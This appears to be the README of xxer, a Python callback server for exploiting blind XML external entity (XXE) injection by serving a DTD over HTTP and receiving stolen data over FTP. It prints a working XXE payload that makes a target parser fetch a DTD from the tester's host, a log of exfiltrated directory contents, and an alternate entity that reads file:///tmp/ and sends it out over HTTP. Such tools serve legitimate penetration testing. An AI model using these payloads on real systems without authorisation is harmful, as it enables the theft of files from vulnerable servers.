xxer: A blind XXE injection callback handler



A blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by ONsec-Lab. Rewritten here because I don’t like Ruby.

Basically, this doesn’t actually find XXE injection for you, it helps you deal with getting useful information back once you’ve found a vulnerable input. For actually finding vulnerable injection points, I recommend using a small HTTP payload and some sort of DNS callback service like Burp Collaborator. If Collaborator reports a DNS lookup, followed by an HTTP request, then you’re good to go.


  • Only has one exfiltration point (currently, the FTP password). Obviously, this can be changed up as needed but may require some basic code changes (specifically in the FTP handlers).
  • Install via pip. Needs at least a requirements.txt or a setup.py. For now, just clone and run.
  • Currently serves up everything in the folder in which it was run over HTTP. Probably not a huge security risk, but something you should be aware of, especially on a public server.
  • Integrated server file/directory browsing as a future upgrade?

Target Audience

If you can explain what XXE injection is and how to find it, this is for you. If not, check out vulnd_xxe.


git clone https://github.com/TheTwitchy/xxer.git


root@kali:~$ xxer.py -h

usage: xxer [-h] [-v] [-q] [-p HTTP] [-P FTP] -H HOSTNAME

XXE Injection Handler

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-q, --quiet surpress extra output
-p HTTP, --http HTTP HTTP server port
-P FTP, --ftp FTP FTP server port
Hostname of this server
The DTD file used for the XXE attack

Originally from https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-
server.rb, rewritten in Python by TheTwitchy


root@kali:~$ xxer.py -H kali.host.com

_ _ _ _ ___ ___
|_'_|_'_| -_| _|

version 1.0

info: Starting xxer_httpd on port 8080
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://kali.host.com:8080/ext.dtd">%aaa;%ccc;%ddd;]> - - [23/Apr/2017 20:59:04] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS aaaaaaaaaadescriptivefoldername
Temporary Internet Files
info: FTP: recvd 'TYPE I'
info: FTP: recvd 'EPSV ALL'
info: FTP: recvd 'EPSV'
info: FTP: recvd 'RETR b'



  • I don’t get a callback over HTTP to retrieve ext.dtd.
    • This could mean a number of things, mostly related to not being vulnerable to XXE:
      • External entities may be disallowed. This can be done by rejecting DOCTYPE declarations in documents, which I believe prevents XXE injection.
      • It may also allow entities, but disallow entities from remote sources. I’ve seen this on some Python XML libraries.
      • Outbound traffic could be blocked at a firewall, or requests may only go to whitelisted hosts.
    • There could also be a typo in the payload or a bug. Check the generated ext.dtd file to make sure everything looks correct.
    • If you get some sort of parsing error, make sure you apply URL encoding (or remove it, I dunno) to the payload. Basically, make sure you have the “correct” amount of encoding.
  • The initial HTTP callback for ext.dtd works, but after that I see nothing.
    • This could mean that FTP as a protocol is disabled server-side. Try changing the FTP callback in ext.dtd to an HTTP one, like <!ENTITY % bbb SYSTEM “file:///tmp/”><!ENTITY % ccc “<!ENTITY &#37; ddd SYSTEM ‘http://HOSTNAME:8080/b’>”>. If you get a callback to the /b document, this is probably the case. Try using the gopher protocol as well, but this was removed in Java 1.6.32 (or something close).

Copyright (C) 2017 TheTwitchy

Source: https://github.com/TheTwitchy/